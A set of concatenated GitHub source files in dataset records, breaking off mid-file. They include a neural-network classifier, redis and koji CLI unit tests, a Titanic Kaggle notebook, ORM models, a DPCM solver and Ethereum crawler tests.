Softmax) will be incorrect.\n # The LabelBinarizer is also implemented in a way that this cannot be\n # customized without providing a complete rewrite, so here we patch\n # the `type_of_target` function for this to work correctly.\n import sklearn.preprocessing.label as spl\n spl.type_of_target = lambda _: \"multiclass\"\n\n def fit(self, X, y):\n \"\"\"Fit the neural network to symbolic labels as a classification problem.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training vectors as real numbers, where n_samples is the number of\n samples and n_inputs is the number of input features.\n\n y : array-like, shape (n_samples, n_classes)\n Target values as integer symbols, for either single- or multi-output\n classification problems.\n\n Returns\n -------\n self : object\n Returns this instance.\n \"\"\"\n\n assert X.shape[0] == y.shape[0],\\\n \"Expecting same number of input and output samples.\"\n if y.ndim == 1:\n y = y.reshape((y.shape[0], 1))\n\n if y.shape[1] == 1 and self.layers[-1].type != 'Softmax':\n log.warning('{}WARNING: Expecting `Softmax` type for the last layer '\n 'in classifier.{}\\n'.format(ansi.YELLOW, ansi.ENDC))\n if y.shape[1] > 1 and self.layers[-1].type != 'Sigmoid':\n log.warning('{}WARNING: Expecting `Sigmoid` for last layer in '\n 'multi-output classifier.{}\\n'.format(ansi.YELLOW, ansi.ENDC))\n\n # Deal with single- and multi-output classification problems.\n self.label_binarizers = [sklearn.preprocessing.LabelBinarizer() for _ in range(y.shape[1])]\n ys = [lb.fit_transform(y[:,i]) for i, lb in enumerate(self.label_binarizers)]\n yp = numpy.concatenate(ys, axis=1)\n\n # Also transform the validation set if it was explicitly specified.\n if self.valid_set is not None:\n X_v, y_v = self.valid_set\n if y_v.ndim == 1:\n y_v = y_v.reshape((y_v.shape[0], 1))\n ys = [lb.transform(y_v[:,i]) for i, lb in enumerate(self.label_binarizers)]\n y_vp = numpy.concatenate(ys, axis=1)\n self.valid_set = self._reshape(X_v, y_vp)\n \n # Now train based on a problem transformed into regression.\n return super(Classifier, self)._fit(X, yp)\n\n def partial_fit(self, X, y, classes=None):\n if y.ndim == 1:\n y = y.reshape((y.shape[0], 1))\n\n if classes is not None:\n if isinstance(classes[0], int):\n classes = [classes]\n self.label_binarizers = [sklearn.preprocessing.LabelBinarizer() for _ in range(y.shape[1])]\n for lb, cls in zip(self.label_binarizers, classes):\n lb.fit(cls)\n return self.fit(X, y)\n\n def predict_proba(self, X):\n \"\"\"Calculate probability estimates based on these input features.\n\n Parameters\n ----------\n X : array-like of shape [n_samples, n_features]\n The input data as a numpy array.\n\n Returns\n -------\n y_prob : array-like of shape [n_samples, n_classes]\n The predicted probability of the sample for each class in the\n model, in the same order as the classes.\n \"\"\"\n proba = super(Classifier, self)._predict(X)\n index = 0\n for lb in self.label_binarizers:\n sz = len(lb.classes_)\n proba[:,index:index+sz] /= proba[:,index:index+sz].sum(1, keepdims=True) \n index += sz\n return proba\n\n def predict(self, X):\n \"\"\"Predict class by converting the problem to a regression problem.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features)\n The input data.\n\n Returns\n -------\n y : array-like, shape (n_samples,) or (n_samples, n_classes)\n The predicted classes, or the predicted values.\n \"\"\"\n assert self.label_binarizers != [],\\\n \"Can't predict without fitting: output classes are 
unknown.\"\n\n yp = self.predict_proba(X)\n ys = []\n index = 0\n for lb in self.label_binarizers:\n sz = len(lb.classes_)\n y = lb.inverse_transform(yp[:,index:index+sz], threshold=0.5)\n ys.append(y.reshape((y.shape[0], 1)))\n index += sz\n y = numpy.concatenate(ys, axis=1)\n return y\n","repo_name":"lenguyenthedat/scikit-neuralnetwork","sub_path":"sknn/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":13359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"31596612271","text":"import pytest\n\nfrom upstash_redis import Redis\n\n\n@pytest.fixture(autouse=True)\ndef flush_lists(redis: Redis):\n lists = [\"list1\", \"list2\", \"list3\", \"nonexistent_list\"]\n\n for list_name in lists:\n redis.delete(list_name)\n\n yield\n\n for list_name in lists:\n redis.delete(list_name)\n\n\ndef test_rpush_existing_list(redis: Redis):\n mylist = \"list1\"\n values = [\"value1\", \"value2\", \"value3\"]\n\n result = redis.rpush(mylist, *values)\n assert result == 3\n\n expected_list = [\"value1\", \"value2\", \"value3\"]\n assert redis.lrange(mylist, 0, -1) == expected_list\n\n\ndef test_rpush_empty_list(redis: Redis):\n mylist = \"list2\"\n\n with pytest.raises(Exception):\n redis.rpush(mylist)\n\n\ndef test_rpush_nonexistent_list(redis: Redis):\n mylist = \"nonexistent_list\"\n\n result = redis.rpush(mylist, \"value1\", \"value2\")\n assert result == 2\n\n expected_list = [\"value1\", \"value2\"]\n assert redis.lrange(mylist, 0, -1) == expected_list\n","repo_name":"upstash/redis-python","sub_path":"tests/commands/list/test_rpush.py","file_name":"test_rpush.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"15691002735","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Titanic Competition \n# \n# By Atwine Mugume Twinamatsiko\n\n# ### Competition Description:\n# The sinking of the RMS Titanic is one of the most infamous shipwrecks in history. On April 15, 1912, during her maiden voyage, the Titanic sank after colliding with an iceberg, killing 1502 out of 2224 passengers and crew. This sensational tragedy shocked the international community and led to better safety regulations for ships.\n# \n# One of the reasons that the shipwreck led to such loss of life was that there were not enough lifeboats for the passengers and crew. Although there was some element of luck involved in surviving the sinking, some groups of people were more likely to survive than others, such as women, children, and the upper-class.\n# \n# In this challenge, we ask you to complete the analysis of what sorts of people were likely to survive. 
In particular, we ask you to apply the tools of machine learning to predict which passengers survived the tragedy.\n# \n# This is a supervised problem because we already have the labeled data in which we want to classify the information.\n# \n# ### Evaluation is based on accuracy:\n# \n# The evaluation of the hand-in result files is based on the accuracy of the predictions:\n# from sklearn we can import the accuracy score and use it to test our predictions.\n# \n# Hand-in format is:\n# Passenger ID, Survived\n\n# In[ ]:\n\n\n#importing necessary libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\nget_ipython().magic(u'matplotlib inline')\n\n\n# In[ ]:\n\n\n#let us import the data we have from the competition\ntest = pd.read_csv('../input/test.csv')\ntrain = pd.read_csv('../input/train.csv')\ngendr = pd.read_csv('../input/gender_submission.csv')\n\n\n# ### Now that the data has been imported we look at initial exploration\n# \n# Let's begin with the train dataset\n\n# In[ ]:\n\n\n#what does our dataset look like\ntrain.shape\n\n\n# In[ ]:\n\n\n#let us see the kind of data types we are working with\ntrain.info()\n\n\n# We have numeric and non-numeric objects that we have to deal with since the machine learning algorithm only deals with numeric data\n\n# In[ ]:\n\n\ntrain.head()\n\n\n# ### Since the train and test data are at times similar it's easier to work on them at the same time\n\n# In[ ]:\n\n\ntest.info()\n\n\n# As we can see, the test data has one column fewer than the training data, and that is the Survived column:\n\n# In[ ]:\n\n\n#let's first drop the survived column in the train dataset and then merge the two of them\nsurvived = train['Survived']\n\n\n# In[ ]:\n\n\ntrain.drop(columns=('Survived'), inplace=True)\n\n\n# In[ ]:\n\n\ntrain.shape\n\n\n# In[ ]:\n\n\n#first we create two differentiating columns in the two data frames\ntrain['Tag']='train'\ntest['Tag']= 'test'\n\n\n# In[ ]:\n\n\n#we now concatenate the frames\nframes = [train, test]\ndf = pd.concat(frames)\n\n\n# In[ ]:\n\n\n#now that we have the two data frames in one, it is easier to apply the initial exploration functions\ndf.head()\n\n\n# In[ ]:\n\n\n#there are some values that may not be necessary while we are doing our analysis such as name\ndrop_columns = ['PassengerId','Name','Ticket']\ndf.drop(columns=drop_columns, inplace=True)\n\n\n# In[ ]:\n\n\n#how many null values do we have\n#4 seems like a few\ndf.isnull().any().sum()\n\n\n# In[ ]:\n\n\ndf.info()\n\n\n# In[ ]:\n\n\ndf.head()\n\n\n# In[ ]:\n\n\n#now to separate the two data sets based on the tag columns\ntest_df = df[df['Tag']== 'test']\ntrain_df = df[df['Tag']== 'train']\n\n\n# In[ ]:\n\n\ntrain_df.drop(columns=('Tag'), inplace= True)\n\n\n# In[ ]:\n\n\ntest_df.drop(columns=('Tag'), inplace= True)\n\n\n# In[ ]:\n\n\n#these are the numeric data frames we have formed and are easy to look at\ntrain_df = pd.get_dummies(train_df)\ntest_df = pd.get_dummies(test_df)\n\n\n# In[ ]:\n\n\ntrain_df.head()\n\n\n# In[ ]:\n\n\n#one hot encoding adds variables that we did not create so we have to align the data frames\ntrain_df,test_df = train_df.align(test_df, join= 'inner', axis=1)\n\n\n# In[ ]:\n\n\nprint('The remaining features', train_df.shape)\nprint('The remaining test features', test_df.shape)\n\n\n# In[ ]:\n\n\n#now let's return the survived column to the training data set\ntrain_df['Survived'] = survived\n\n\n# In[ ]:\n\n\ntrain_df.shape\n\n\n# In[ ]:\n\n\n#replace the NaN with 0 so that I can use the mean values to impute\ntrain_df['Age']= train_df['Age'].replace(0, np.nan)\ntrain_df.fillna(train_df.mean(), inplace=True)\n\ntest_df['Age']= test_df['Age'].replace(0, np.nan)\ntest_df.fillna(test_df.mean(), inplace=True)\n\n\n# ### Now that I have mostly numeric values let's explore\n\n# In[ ]:\n\n\n#let's have a look at the survived variable\ntrain_df['Survived'].value_counts()\n\n\n# In[ ]:\n\n\n#let's display it\ntrain_df['Survived'].astype(int).hist()\n\n\n# In[ ]:\n\n\n#let's see if we have any missing values\n# we have none of those\ntrain_df.isnull().any().sum()\n\n\n# In[ ]:\n\n\n#column types\ntrain_df.dtypes.value_counts()\n\n\n# In[ ]:\n\n\n#what is the correlation of the variables to the target variable?\n\n\n# In[ ]:\n\n\nCorr = train_df.corr()['Survived'].sort_values()\n\n#Print them\nprint('Most positive correlations', Corr.tail(10))\nprint('-'*20)\nprint('Most negative correlations', Corr.head(10))\n\n\n# ### Manual Feature Engineering:\n\n# ### Train features\n\n# In[ ]:\n\n\n#we need to group by the client id, therefore we need to add it back in the df\ntrain_df['ID'] = train['PassengerId']\ntrain_df.head()\n\n\n# In[ ]:\n\n\n#in order to create features we remove survived first\ntrain_df.drop(columns= ('Survived'), inplace= True)\n\n\n# In[ ]:\n\n\ntrain_df.head()\n\n\n# In[ ]:\n\n\n#we are going to make new features with the aggregation functions; those are functions like mean and others\ntrain_agg = train_df.groupby('ID',as_index= False).agg(['count', 'mean', 'max', 'min', 'sum']).reset_index()\ntrain_agg.head()\n\n\n# We need to create new names for each of these columns. The following code makes new names by appending the stat to the name. Here we have to deal with the fact that the dataframe has a multi-level index. I find these confusing and hard to work with, so I try to reduce to a single level index as quickly as possible.\n\n# In[ ]:\n\n\n# List of column names\ncolumns = ['ID']\n\n# Iterate through the variable names\nfor var in train_agg.columns.levels[0]:\n # Skip the id name\n if var != 'ID':\n \n # Iterate through the stat names\n for stat in train_agg.columns.levels[1][:-1]:\n # Make a new column name for the variable and stat\n columns.append('train_%s_%s' % (var, stat))\n\n\n# In[ ]:\n\n\ntrain_agg.columns = columns\ntrain_agg.head()\n\n\n# In[ ]:\n\n\n#we now have to merge the train_df with the train agg\ntrain_df = train_df.merge(train_agg, on = 'ID', how = 'left')\n\n\n# In[ ]:\n\n\n# List of new correlations\nnew_corrs = []\n\n# Iterate through the columns \nfor col in columns:\n # Calculate correlation with the target\n corr = train_df['ID'].corr(train_df[col])\n \n # Append the list as a tuple\n\n new_corrs.append((col, corr))\n\n\n# In[ ]:\n\n\n\n\n\n# We have created many more columns, but they are not all useful. We have to test the correlations to decide whether they need to be used in this instance\n\n# In[ ]:\n\n\n# Sort the correlations by the absolute value\n# Make sure to reverse to put the largest values at the front of the list\nnew_corrs = sorted(new_corrs, key = lambda x: abs(x[1]), reverse = True)\nnew_corrs[:15]\n\n\n# ### Test Features\n\n# In[ ]:\n\n\n#we now do the same thing for the test data\n#we need to group by the client id\ntest_df['ID'] = test['PassengerId']\n\n\n# In[ ]:\n\n\n#we are going to make new features with the aggregation functions; those are functions like mean and others\ntest_agg = test_df.groupby('ID',as_index= False).agg(['count', 'mean', 'max', 'min', 'sum']).reset_index()\ntest_agg.head()\n\n\n# In[ ]:\n\n\n# List of column names\ncolumns2 = ['ID']\n\n# Iterate through the variable names\nfor var2 in test_agg.columns.levels[0]:\n # Skip the id name\n if var2 != 'ID':\n \n # Iterate through the stat names\n for stat in test_agg.columns.levels[1][:-1]:\n # Make a new column name for the variable and stat\n columns2.append('test_%s_%s' % (var2, stat))\n\n\n# In[ ]:\n\n\ntest_agg.columns = columns2\ntest_agg.head()\n\n\n# In[ ]:\n\n\n#we now have to merge the test_df with the test agg\ntest_df = test_df.merge(test_agg, on = 'ID', how = 'left')\n\n\n# In[ ]:\n\n\ntrain_df.shape , test_df.shape\n\n\n# In[ ]:\n\n\n#because the data was split into two data frames, we now combine them back to get the full number of people on the boat\nadd = [train_df,test_df]\ntest_fin = pd.concat(add)\n\n\n# In[ ]:\n\n\n#returning the survived column to train\ntrain_df['Survived'] = survived\n\n\n# In[ ]:\n\n\ntrain_df.shape , test_df.shape\n\n\n# In[ ]:\n\n\n# train_df.to_csv('train_df.csv')\n# test_df.to_csv('test_df.csv')\n\n\n# In[ ]:\n\n\n\n\n\n# ## Modeling\n\n# In[ ]:\n\n\nimport lightgbm as lgb\n\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import LabelEncoder\n\nimport gc\n\nimport matplotlib.pyplot as plt\n\n\n# In[ ]:\n\n\ndef model(features, test_features, encoding = 'ohe', n_folds = 5):\n \n \"\"\"Train and test a light gradient boosting model using\n cross validation. \n \n Parameters\n --------\n features (pd.DataFrame): \n dataframe of training features to use \n for training a model. Must include the TARGET column.\n test_features (pd.DataFrame): \n dataframe of testing features to use\n for making predictions with the model. \n encoding (str, default = 'ohe'): \n method for encoding categorical variables. 
Either 'ohe' for one-hot encoding or 'le' for integer label encoding\n n_folds (int, default = 5): number of folds to use for cross validation\n \n Return\n --------\n submission (pd.DataFrame): \n dataframe with `SK_ID_CURR` and `TARGET` probabilities\n predicted by the model.\n feature_importances (pd.DataFrame): \n dataframe with the feature importances from the model.\n valid_metrics (pd.DataFrame): \n dataframe with training and validation metrics (ROC AUC) for each fold and overall.\n \n \"\"\"\n \n # Extract the ids\n train_ids = features['ID']\n test_ids = test_features['ID']\n \n # Extract the labels for training\n labels = features['Survived']\n \n # Remove the ids and target\n features = features.drop(columns = ['ID', 'Survived'])\n test_features = test_features.drop(columns = ['ID'])\n \n \n # One Hot Encoding\n if encoding == 'ohe':\n features = pd.get_dummies(features)\n test_features = pd.get_dummies(test_features)\n \n # Align the dataframes by the columns\n features, test_features = features.align(test_features, join = 'inner', axis = 1)\n \n # No categorical indices to record\n cat_indices = 'auto'\n \n # Integer label encoding\n elif encoding == 'le':\n \n # Create a label encoder\n label_encoder = LabelEncoder()\n \n # List for storing categorical indices\n cat_indices = []\n \n # Iterate through each column\n for i, col in enumerate(features):\n if features[col].dtype == 'object':\n # Map the categorical features to integers\n features[col] = label_encoder.fit_transform(np.array(features[col].astype(str)).reshape((-1,)))\n test_features[col] = label_encoder.transform(np.array(test_features[col].astype(str)).reshape((-1,)))\n\n # Record the categorical indices\n cat_indices.append(i)\n \n # Catch error if label encoding scheme is not valid\n else:\n raise ValueError(\"Encoding must be either 'ohe' or 'le'\")\n \n print('Training Data Shape: ', features.shape)\n print('Testing Data Shape: ', test_features.shape)\n \n # Extract feature names\n feature_names = list(features.columns)\n \n # Convert to np arrays\n features = np.array(features)\n test_features = np.array(test_features)\n \n # Create the kfold object\n k_fold = KFold(n_splits = n_folds, shuffle = False, random_state = 50)\n \n # Empty array for feature importances\n feature_importance_values = np.zeros(len(feature_names))\n \n # Empty array for test predictions\n test_predictions = np.zeros(test_features.shape[0])\n \n # Empty array for out of fold validation predictions\n out_of_fold = np.zeros(features.shape[0])\n \n # Lists for recording validation and training scores\n valid_scores = []\n train_scores = []\n \n # Iterate through each fold\n for train_indices, valid_indices in k_fold.split(features):\n \n # Training data for the fold\n train_features, train_labels = features[train_indices], labels[train_indices]\n # Validation data for the fold\n valid_features, valid_labels = features[valid_indices], labels[valid_indices]\n \n # Create the model\n model = lgb.LGBMClassifier(n_estimators=10000, objective = 'binary', \n class_weight = 'balanced', learning_rate = 0.05, \n reg_alpha = 0.1, reg_lambda = 0.1, \n subsample = 0.8, n_jobs = -1, random_state = 50)\n \n # Train the model\n model.fit(train_features, train_labels, eval_metric = 'auc',\n eval_set = [(valid_features, valid_labels), (train_features, train_labels)],\n eval_names = ['valid', 'train'], categorical_feature = cat_indices,\n early_stopping_rounds = 100, verbose = 200)\n \n # Record the best iteration\n best_iteration = model.best_iteration_\n 
\n # Record the feature importances\n feature_importance_values += model.feature_importances_ / k_fold.n_splits\n \n # Make predictions\n test_predictions += model.predict_proba(test_features, num_iteration = best_iteration)[:, 1] / k_fold.n_splits\n \n # Record the out of fold predictions\n out_of_fold[valid_indices] = model.predict_proba(valid_features, num_iteration = best_iteration)[:, 1]\n \n # Record the best score\n valid_score = model.best_score_['valid']['auc']\n train_score = model.best_score_['train']['auc']\n \n valid_scores.append(valid_score)\n train_scores.append(train_score)\n \n # Clean up memory\n gc.enable()\n del model, train_features, valid_features\n gc.collect()\n \n # Make the submission dataframe\n submission = pd.DataFrame({'ID': test_ids, 'Survived': test_predictions})\n \n # Make the feature importance dataframe\n feature_importances = pd.DataFrame({'feature': feature_names, 'importance': feature_importance_values})\n \n # Overall validation score\n valid_auc = roc_auc_score(labels, out_of_fold)\n \n # Add the overall scores to the metrics\n valid_scores.append(valid_auc)\n train_scores.append(np.mean(train_scores))\n \n # Needed for creating dataframe of validation scores\n fold_names = list(range(n_folds))\n fold_names.append('overall')\n \n # Dataframe of validation scores\n metrics = pd.DataFrame({'fold': fold_names,\n 'train': train_scores,\n 'valid': valid_scores}) \n \n return submission, feature_importances, metrics\n\n\n# In[ ]:\n\n\ndef plot_feature_importances(df):\n \"\"\"\n Plot importances returned by a model. This can work with any measure of\n feature importance provided that higher importance is better. \n \n Args:\n df (dataframe): feature importances. Must have the features in a column\n called `features` and the importances in a column called `importance\n \n Returns:\n shows a plot of the 15 most importance features\n \n df (dataframe): feature importances sorted by importance (highest to lowest) \n with a column for normalized importance\n \"\"\"\n \n # Sort features according to importance\n df = df.sort_values('importance', ascending = False).reset_index()\n \n # Normalize the feature importances to add up to one\n df['importance_normalized'] = df['importance'] / df['importance'].sum()\n\n # Make a horizontal bar chart of feature importances\n plt.figure(figsize = (10, 6))\n ax = plt.subplot()\n \n # Need to reverse the index to plot most important on top\n ax.barh(list(reversed(list(df.index[:15]))), \n df['importance_normalized'].head(15), \n align = 'center', edgecolor = 'k')\n \n # Set the yticks and labels\n ax.set_yticks(list(reversed(list(df.index[:15]))))\n ax.set_yticklabels(df['feature'].head(15))\n \n # Plot labeling\n plt.xlabel('Normalized Importance'); plt.title('Feature Importances')\n plt.show()\n \n return df\n\n\n# ### Let us now employ the functions above to run the model\n\n# In[ ]:\n\n\nsubmission, correlations, metrics = model(train_df,test_fin)\n\n\n# In[ ]:\n\n\nmetrics\n\n\n# In[ ]:\n\n\n#lets plot the feature importances\ncorr = plot_feature_importances(correlations)\n\n\n# In[ ]:\n\n\nsubmission['Survived'] = submission['Survived'].round(0)\n\n\n# In[ ]:\n\n\n# submission.to_csv('Titanic_Submission2.csv')\n\n\n# In[ 
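
One small note on the submission post-processing above: `Series.round(0)` rounds half-to-even and leaves the column as floats. If hard 0/1 labels are wanted for the hand-in file, an explicit threshold is clearer; a sketch, assuming `submission` as returned by `model()` (the `index=False` is an assumption about the expected hand-in format):

```python
# Hard labels via an explicit 0.5 threshold instead of Series.round(0).
submission['Survived'] = (submission['Survived'] >= 0.5).astype(int)
submission.to_csv('Titanic_Submission2.csv', index=False)
```
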
]:\n\n\n\n\n","repo_name":"nischalshrestha/automatic_wat_discovery","sub_path":"Notebooks/py/atwine/titanic-first-trial/titanic-first-trial.py","file_name":"titanic-first-trial.py","file_ext":"py","file_size_in_byte":17206,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"13100998106","text":"from handshake.services.DBService.models.static_base import AttachmentFields\nfrom handshake.services.DBService.models.result_base import SuiteBase\nfrom tortoise.models import Model\nfrom tortoise.fields import (\n CharField,\n DatetimeField,\n JSONField,\n CharEnumField,\n ForeignKeyField,\n ForeignKeyRelation,\n BooleanField,\n TextField,\n)\nfrom handshake.services.SchedularService.constants import JobType\nfrom handshake.services.DBService.models.result_base import RunBase\nfrom handshake.services.DBService.models.enums import PrunedRecords\n\n\nclass TaskBase(Model):\n table = \"TaskBase\"\n\n ticketID = CharField(max_length=45, pk=True)\n type = CharEnumField(JobType, null=False)\n dropped = DatetimeField(auto_now=True) # use modified timestamp\n # this would schedule the parent suites in the later rounds\n meta = JSONField(\n null=True,\n default={},\n description=\"Data required to process the task, Not used as of now though\",\n )\n test: ForeignKeyRelation[RunBase] = ForeignKeyField(\n \"models.RunBase\", related_name=\"tasks\", to_field=\"testID\"\n )\n picked = BooleanField(\n null=True,\n default=False,\n description=\"True if the task is picked by the job else False\",\n )\n\n\nclass DynamicVideoBase(AttachmentFields):\n table = \"VideoBase\"\n test: ForeignKeyRelation[SuiteBase] = ForeignKeyField(\n \"models.SuiteBase\", related_name=\"attachments\", to_field=\"suiteID\"\n )\n\n\nclass PrunedBase:\n prunedID = CharField(\n max_length=36, description=\"possibly uuid of length 36 that was pruned\"\n )\n reason = TextField(description=\"Reason for its existence here\")\n details = JSONField(\n null=True, default={}, description=\"If any details were required\"\n )\n type = CharEnumField(PrunedRecords, null=False)\n","repo_name":"RahulARanger/graspit","sub_path":"handshake/services/DBService/models/dynamic_base.py","file_name":"dynamic_base.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71503947681","text":"#!/usr/bin/env python3\n\nimport sys\n\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.buffer.readline\n\n\ndef round_0_255(num):\n if num < 0:\n return 0\n elif num > 255:\n return 255\n else:\n return num\n\n\nwhile True:\n n_samples, m_codes = map(int, input().split())\n if n_samples == 0 and m_codes == 0:\n break\n\n code_book = []\n for _ in range(m_codes):\n code_book.append(int(input()))\n\n input_signal = []\n for _ in range(n_samples):\n input_signal.append(int(input()))\n\n # print(code_book, input_signal)\n\n # dp[i + 1][j]: i番目の入力信号を復号した結果がjとなる場合の、(i番目までの信号の)差の二乗和の最小値\n # i番目の入力信号を復号した結果をy_iとすると、y_iは以下で与えられる\n # y_i = y_{i-1} + C[k_i]\n # sq_diff = (x[i] - y_i) ** 2\n # dp[i + 1][j] = min(dp[i + 1][j], dp[i][j - C[k_i]] + sq_diff)\n\n inf = float(\"inf\")\n dp = [[inf for j in range(255 + 1)] for i in range(n_samples + 1)]\n dp[0][128] = 0\n\n for i in range(n_samples):\n for j in range(255 + 1):\n for c_k in code_book:\n sq_diff = (input_signal[i] - j) ** 2\n dp[i + 1][j] = min(dp[i + 1][j], dp[i][round_0_255(j - c_k)] + sq_diff)\n # print(dp[n_samples])\n 
print(min(dp[n_samples]))\n","repo_name":"d-matsui/atcorder","sub_path":"100-problems/45-dpcm.py","file_name":"45-dpcm.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38175203642","text":"import unittest\nfrom datetime import datetime\nfrom main import (\n retrieve_transaction_data,\n retrieve_wallet_creation_date,\n retrieve_balance_at_date\n)\n\nclass TestMain(unittest.TestCase):\n def test_retrieve_transaction_data(self):\n # Test valid inputs\n wallet_address = \"0x1234567890123456789012345678901234567890\"\n starting_block = \"1000000\"\n transactions = retrieve_transaction_data(wallet_address, starting_block)\n self.assertIsInstance(transactions, list)\n\n # Test invalid starting block\n invalid_starting_block = \"-100\"\n with self.assertRaises(ValueError):\n retrieve_transaction_data(wallet_address, invalid_starting_block)\n\n def test_retrieve_wallet_creation_date(self):\n # Test valid inputs\n wallet_address = \"0x1234567890123456789012345678901234567890\"\n creation_date = retrieve_wallet_creation_date(wallet_address)\n self.assertIsInstance(creation_date, datetime)\n\n # Test invalid wallet address\n invalid_wallet_address = \"\"\n with self.assertRaises(ValueError):\n retrieve_wallet_creation_date(invalid_wallet_address)\n \n def test_retrieve_balance_at_date(self):\n # Test valid inputs\n wallet_address = \"0x1234567890123456789012345678901234567890\"\n check_date = datetime.today().replace(hour=0, minute=0, second=0, microsecond=0)\n balance_eth = retrieve_balance_at_date(wallet_address, check_date)\n self.assertIsInstance(balance_eth, float)\n\n # Test check date before wallet creation\n wallet_creation_date = datetime(2022, 1, 1)\n with self.assertRaises(ValueError):\n retrieve_balance_at_date(wallet_address, wallet_creation_date)\n\n # Test check date after today\n future_date = datetime.today().replace(year=2025)\n with self.assertRaises(ValueError):\n retrieve_balance_at_date(wallet_address, future_date)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"miroslavkosanovic/Ethereum-transactions-crawler-task","sub_path":"test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21337172857","text":"from __future__ import absolute_import\nimport koji\nimport mock\nimport unittest\nfrom six.moves import StringIO\n\nfrom koji_cli.commands import anon_handle_list_untagged\nfrom . 
import utils\n\n\nclass TestListUntagged(utils.CliTestCase):\n def setUp(self):\n self.maxDiff = None\n self.session = mock.MagicMock()\n self.options = mock.MagicMock()\n self.untagged_values = [{'id': 1,\n 'name': 'test-package-1234',\n 'release': '11',\n 'version': '1.1'},\n {'id': 2,\n 'name': 'test-package-1234',\n 'release': '99',\n 'version': '1.33'}\n ]\n\n def __vm(self, result):\n m = koji.VirtualCall('mcall_method', [], {})\n if isinstance(result, dict) and result.get('faultCode'):\n m._result = result\n else:\n m._result = (result,)\n return m\n\n def tearDown(self):\n mock.patch.stopall()\n\n @mock.patch('sys.stdout', new_callable=StringIO)\n @mock.patch('koji_cli.commands.ensure_connection')\n def test_list_untagged_without_arguments(self, ensure_connection_mock,\n stdout):\n package_name = 'test-package-1234'\n\n self.session.untaggedBuilds.return_value = self.untagged_values\n expected = \"\\n\".join([u['name'] + '-' + u['version'] + '-' +\n u['release'] for u in self.untagged_values]) + \"\\n\"\n anon_handle_list_untagged(self.options, self.session, [package_name])\n self.assert_console_message(stdout, expected)\n\n @mock.patch('koji_cli.commands.ensure_connection')\n def test_list_untagged_more_arguments(self, ensure_connection_mock):\n packages_name = ['test-package-1', 'test-package-2']\n expected = \"\"\"Usage: %s list-untagged [options] [<package>]\n(Specify the --help global option for a list of other help options)\n\n%s: error: Only one package name may be specified\\n\"\"\" % (self.progname,\n self.progname)\n self.assert_system_exit(\n anon_handle_list_untagged,\n self.options,\n self.session,\n [packages_name[0], packages_name[0]],\n stderr=expected,\n activate_session=None)\n\n @mock.patch('sys.stderr', new_callable=StringIO)\n @mock.patch('sys.stdout', new_callable=StringIO)\n @mock.patch('koji_cli.commands.ensure_connection')\n def test_list_untagged_package(self, ensure_connection, stdout, stderr):\n # test case when package is existing\n package_name = 'test-package-1234'\n\n self.session.untaggedBuilds.return_value = self.untagged_values\n expected = \"\\n\".join([u['name'] + '-' + u['version'] + '-' +\n u['release'] for u in self.untagged_values]) + \"\\n\"\n anon_handle_list_untagged(self.options, self.session, [package_name])\n self.assert_console_message(stdout, expected)\n\n self.session.untaggedBuilds.reset_mock()\n\n # test case when package is not existing\n package_name = 'test-package'\n expected = \"No such package: %s\" % package_name + \"\\n\"\n self.session.untaggedBuilds.return_value = []\n self.session.getPackageID.return_value = None\n with self.assertRaises(SystemExit) as ex:\n anon_handle_list_untagged(self.options, self.session,\n [package_name])\n self.assertExitCode(ex, 1)\n self.assert_console_message(stderr, expected)\n\n @mock.patch('sys.stdout', new_callable=StringIO)\n @mock.patch('koji_cli.commands.ensure_connection')\n def test_list_untagged_package_path(self, ensure_connection, stdout):\n # test case when package is existing\n package_name = 'test-package-1234'\n\n self.session.untaggedBuilds.return_value = self.untagged_values\n expected = \"\\n\".join(['/mnt/koji/packages/' + u['name'] + '/' +\n u['version'] + '/' + u['release']\n for u in self.untagged_values]) + \"\\n\"\n anon_handle_list_untagged(self.options, self.session,\n ['--paths', package_name])\n self.assert_console_message(stdout, expected)\n\n @mock.patch('sys.stdout', new_callable=StringIO)\n @mock.patch('koji_cli.commands.ensure_connection')\n def 
test_list_untagged_package_show_references(self, ensure_connection, stdout):\n # test case when package is existing\n rpms = [{'rpm_id': 123}, {'rpm_id': 125}]\n archives = [{'archive_id': 999}, {'archive_id': 888}]\n components = [{'archive_id': 999, 'rpm_id': 125}]\n build_references = {'tags': [{'name': 'tag-48rj15ma3a', 'tag_id': 2}],\n 'rpms': rpms,\n 'component_of': components,\n 'archives': archives,\n 'last_used': None,\n 'images': []}\n mcall = self.session.multicall.return_value.__enter__.return_value\n mcall.buildReferences.return_value = self.__vm(build_references)\n package_name = 'test-package-1234'\n\n self.session.untaggedBuilds.return_value = self.untagged_values\n list_untagged = [u['name'] + '-' + u['version'] + '-' + u['release']\n for u in self.untagged_values]\n expected = \"\"\"(Showing build references)\n%s rpms: %s, images/archives: %s, archives buildroots: %s\n%s rpms: %s, images/archives: %s, archives buildroots: %s\n\"\"\" % (list_untagged[0], rpms, components, archives, list_untagged[1], rpms, components, archives)\n anon_handle_list_untagged(self.options, self.session,\n ['--show-references', package_name])\n self.assert_console_message(stdout, expected)\n\n def test_handle_list_history_help(self):\n self.assert_help(\n anon_handle_list_untagged,\n \"\"\"Usage: %s list-untagged [options] [<package>]\n(Specify the --help global option for a list of other help options)\n\nOptions:\n -h, --help show this help message and exit\n 